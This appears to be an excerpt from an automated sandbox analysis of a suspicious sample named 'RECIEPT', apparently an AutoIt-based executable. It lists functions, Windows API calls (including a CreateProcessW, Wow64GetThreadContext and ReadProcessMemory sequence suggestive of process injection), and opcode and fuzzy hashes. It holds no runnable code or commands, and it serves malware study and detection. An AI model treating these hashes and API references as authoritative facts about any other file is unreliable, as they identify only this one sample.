                                        • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                        • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 03F08ADB
                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F08B71
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F08B93
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2401390956.0000000003F07000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F07000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3f07000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                        • String ID:
                                        • API String ID: 2438371351-0
                                        • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                        • Instruction ID: a086204b39228c389d8c45fd8c78e1ef7ea3f917842e891586f666be73decad9
                                        • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                        • Instruction Fuzzy Hash: F9620A70A14658DBEB24CBA4C850BDEB376EF58300F1091A9D10DEB3D0E7799E81DB5A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                        • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                        • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                        • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 0047950F
                                        • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                        • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                        • VariantClear.OLEAUT32(?), ref: 00479650
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Variant$AllocClearCopyInitString
                                        • String ID:
                                        • API String ID: 2808897238-0
                                        • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                        • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                        • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                        • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: Error:
                                        • API String ID: 4104443479-232661952
                                        • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                        • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                        • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                        • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                        APIs
                                        • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                          • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                          • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                          • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                          • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                        • String ID: X$pWH
                                        • API String ID: 85490731-941433119
                                        • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                        • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                        • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                        • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                        APIs
                                        • _wcslen.LIBCMT ref: 00401B11
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • _memmove.LIBCMT ref: 00401B57
                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                        • String ID: @EXITCODE
                                        • API String ID: 2734553683-3436989551
                                        • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                        • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                        • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                        • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                        • String ID:
                                        • API String ID: 1794320848-0
                                        • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                        • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                        • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                        • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                        APIs
                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_
                                        • String ID:
                                        • API String ID: 1144537725-0
                                        • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                        • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                        • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                        • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                        APIs
                                        • _malloc.LIBCMT ref: 0043214B
                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                        • _malloc.LIBCMT ref: 0043215D
                                        • _malloc.LIBCMT ref: 0043216F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _malloc$AllocateHeap
                                        • String ID:
                                        • API String ID: 680241177-0
                                        • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                        • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                        • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                        • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                        APIs
                                        • TranslateMessage.USER32(?), ref: 00409556
                                        • DispatchMessageW.USER32(?), ref: 00409561
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Message$DispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 4217535847-0
                                        • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                        • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                        • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                        • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                        APIs
                                          • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                        • _free.LIBCMT ref: 004295A0
                                          • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                          • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                          • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                          • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                          • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                          • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                        • String ID: >>>AUTOIT SCRIPT<<<
                                        • API String ID: 3938964917-2806939583
                                        • Opcode ID: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                        • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                        • Opcode Fuzzy Hash: 54ef76e4734de236163cd7b280f05d5101af8392224d903fd41af02c4ea86240
                                        • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                        Strings
                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _strcat
                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                        • API String ID: 1765576173-2684727018
                                        • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                        • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                        • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                        • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                        • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                        • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                        • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: a57e6d4aea9ef27badbc9b4b1c8ddb52858cb97d4f84bb6cc5dd8c3df2be8051
                                        • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                                        • Opcode Fuzzy Hash: a57e6d4aea9ef27badbc9b4b1c8ddb52858cb97d4f84bb6cc5dd8c3df2be8051
                                        • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                                        APIs
                                          • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                        • _strcat.LIBCMT ref: 0040F786
                                          • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                          • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                        • String ID:
                                        • API String ID: 3199840319-0
                                        • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                        • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                        • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                        • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                        APIs
                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                        • __lock_file.LIBCMT ref: 00414A8D
                                          • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                        • __fclose_nolock.LIBCMT ref: 00414A98
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                        • String ID:
                                        • API String ID: 2800547568-0
                                        • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                        • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                        • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                        • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                        APIs
                                        • __lock_file.LIBCMT ref: 00415012
